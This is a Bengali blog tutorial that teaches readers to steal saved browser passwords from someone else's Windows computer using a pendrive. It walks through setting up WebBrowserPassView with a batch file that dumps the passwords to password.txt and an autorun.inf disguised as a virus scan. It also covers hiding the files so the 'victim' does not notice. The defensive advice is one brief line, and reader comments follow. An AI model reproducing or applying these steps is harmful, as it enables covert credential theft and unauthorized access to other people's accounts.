আসসালামু আলাইকুম!! আজকের পর্বে দেখাবো খুব সিম্পল একটা ট্রিক।
আপনার নিশ্চয় মাঝে মাঝে মনে হয় যদি হ্যাকিং মুভির মতো জাস্ট পেনড্রাইভ অন্যের কম্পিউটারে ঢুকাবো আর বের করে ফেলবো তাহলেই হ্যাক হয়ে যাবে!!
হ্যাঁ, সেটাই আজ দেখাবো এবং এই ধরণের হ্যাকিং থেকে বাঁচার উপায়ও বলে দেব ইনশাল্লাহ!!
আচ্ছা, কথা অনেক হয়েছে এখন কি কি লাগবে সেটা বলে দিচ্ছি।
- Windows Computer [ XP or Vista or 7 or 8 or 10]
- Pendrive
- Web Browser Pass View Software [ Just 226 Kilobyte]
নিচের দেয়া লিংক থেকে সফটওয়্যার টি ডাউনলোড করে নিনঃ-
Download from here www.filehorse.com/download–webbrowserpassview
or
Download from here www.download.hr/download–webbrowserpassview.html
উপরের দেয়া দুইটা লিংক এর যেকোন একটা থেকে ডাউনলোড করে নিন। সাইজ মাত্র 226 Kilobyte.
আচ্ছা, এখন আমরা তৈরি মিশন “ভাইরাস দিয়ে করি ধবংস করি” এর জন্য।
নিচের কাজ গুলো স্টেপ বাই স্টেপ ফলো করুন।
স্টেপ-১:—
ডাউনলোড করা ফাইল এক্সট্রাক্ট করুন। এখন, ভেতরে দেখবেন তিনটি ফাইল আছে। কোন কিছুতে ক্লিক করবেন না।
স্টেপ-২:—
একটা ফোল্ডার তৈরি করুন নাম দিবেন “data”। এবং এক্সট্রাক্ট করে পাওয়া ওই তিনটা ফাইল কপি করে এই data ফোল্ডারে রাখুন।
স্টেপ-৩:—
আপনার পেন্ড্রাইভ কম্পিউটারে প্রবেশ করান (পেন্ড্রাইভ যেন ফাকা থাকে)। এবং ওই “data” ফোল্ডার কপি করে পেন্ড্রাইভে রেখে দিন।
স্টেপ-৪:—
এবার নোটপ্যাড ওপেন করে নিচের কোডটুকু কপি করে drive নামের এবং .bat ফাইল হিসেবে সেভ করুন। ( আগের পর্বে দেখিয়েছিলাম কিভাবে সেভ করতে হবে।)
start data\WebBrowserPassView.exe \stext password.txt
স্টেপ-৫:—
আবার আগের মতো নোটপ্যাড ওপেন করে নিচের কোডটুকু কপি করে পেস্ট করে দেন। এই ফাইলটার নাম দিবেন Autorun এবং .inf হিসেবে সেভ কররবেন। আগের মতোই শুধু .bat এর জায়গায় .inf দিলেই সেভ হবে। ( আগের পর্বে দেখিয়েছিলাম কিভাবে সেভ করতে হবে।)
[autorun] open=drive.bat Action=Perform a Virus Scan
এখন এই দুইটা ফাইল (drive.bat এবং autorun.inf) কপি করে পেন্ড্রাইভে রাখুন।
এখন তাহলে আপনার পেন্ড্রাইভে মোট তিনটি জিনিস আছে। data ফোল্ডার, drive.bat এবং autorun.inf
এবং ওই Data ফোল্ডারের ভেতর আছে এক্সট্রাক্ট করা তিনটা ফাইল।
স্টেপ-৬:—
আমাদের অস্ত্র তৈরি। এখন শুধু হ্যাক করার পালা।
এখন পেন্ড্রাইভ টা আপনার ভিক্টিমের কম্পিউটারে ঢোকাবেন এবং ওই drive.bat ফাইলটাতে জাস্ট দুইটা ক্লিক করবেন। কিছুক্ষণ পরে পেন্ড্রাইভ খুলে নিয়ে আপনার পিসিতে লাগান এবং Data ফোল্ডারের ভেতর যেই “password.txt” আছে এইটা ওপেন করুন আর দেখুন মজা!!
নিচে যাওয়ার আগে একবার নিজে করে টেস্ট করুন!!
একটু ওয়েট করেন যদি আপনার ভিক্টিম দেখে পেন্ড্রাইভে এসব ফাইল আছে তাহলে তো সে সন্দেহ করবে। এখন কি করা যায়??
আমরা ফাইল তিনটা হাইড করব।
Windows 7 এবং Xp তে হাইড করার জন্য গুগলে লিখুন “How to hide selected item in windows 7″। উপায় পেয়ে যাবেন। আমি অনেকদিন Windows 7 ব্যবহার করি না।
Windows 8 এবং 10 এ হাইড করার জন্য নিচের কাজ করুন।
Select All files —>
এখন সেলেক্ট করার পরে দেখবেন উপরের টুলবারে View নামের একটা ট্যাব আছে ওখানে ক্লিক করুন। তারপর দেখতে পারবেন ডাক দিকে আছে Hide Selected Items। এটাতে ক্লিক করুন।
ব্যাস!! এখন মনে হচ্ছে পেন্ড্রাইভে আর কিছু নেই।
তাহলে, পেন্ড্রাইভ এখন বের করুন।
কিভাবে হ্যাক হবে??
এবার আপনার পেন্ড্রাইভ যখনই কারোর কম্পিউটারে প্রবেশ করাবেন সাথে সাথে বলবে যে There is a probelm with this drive. Scan the drive now and fix it. আপনি তখন ওখানে ক্লিক করবেন তাহলে পেন্ড্রাইভ সাধারনভাবে স্ক্যান হবে এবং আমাদের কাজও শুরু হয়ে যাবে। অল্প কিছুক্ষণ পরে পেন্ড্রাইভ বের করে নিজের কম্পিউটারে নিবেন এবং ওই Data ফোল্ডারের ভেতর যে password.txt আছে ওটা ওপেন করবেন দেখবেন ভেতরে কি আছে!!!
কিন্তু, আমি এই ধরণের হ্যাকিং থেকে বাঁচবো কিভাবে??
খুব সহজ। ব্রাউজারে পাসওয়ার্ড সেভ করবেন সাধারণত। আর যদিও সেভ করেন তাহলে সেটিং থেকে আগে মাস্টার পাসওয়ার্ড দিয়ে রাখবেন। কিভাবে দিবেন?? গুগল করেন!! 🙂
আজকে অনেক হলো। ভাইরাস দিয়ে আরেকদিন অন্যকিছু ধবংস করব ইনশাল্লাহ!! সে পর্যন্ত ভালো থাকুন। আসসালামু আলাইকুম!! আমি শাহরিয়ার আহমেদ শোভন।।
আরো ভালো আর্টিকেল পেতে চলে যান এই লিংক এ www.thebanglatech.xyz
আপনার সাথে একটু কথা বলার ছিল?
naki click korte hbe na, autorun er shomoy automatic kaj hoye jabe???
Karo ki uporer file gula thikmoto cholse???
please ektu janaben. Windows8 amar
আপনি বললেন,উন্নয়ন মেলায় যদি আসি দেখা করিয়েন।।
আপনার সাথে আমার পার্সনালি কথা বলার দরকার ছিল?আপনার কি একটু সময় হবে?